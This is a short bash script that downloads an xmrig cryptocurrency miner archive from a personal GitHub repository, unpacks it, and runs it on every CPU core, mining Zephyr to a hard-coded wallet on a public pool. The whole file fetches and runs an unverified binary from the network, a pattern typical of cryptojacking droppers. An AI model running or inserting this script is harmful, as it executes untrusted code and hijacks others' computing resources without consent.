#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHYR2BfJ9YCGuEa6svKN7f2vY5BsRQcDp1W7Wn3i8PESzsc1rWvB16HovKsWq3s61w3Me6NanL9Q8QToagPENjGm9bjSHgtM92W -p dik -a rx/0 -t $(nproc --all)
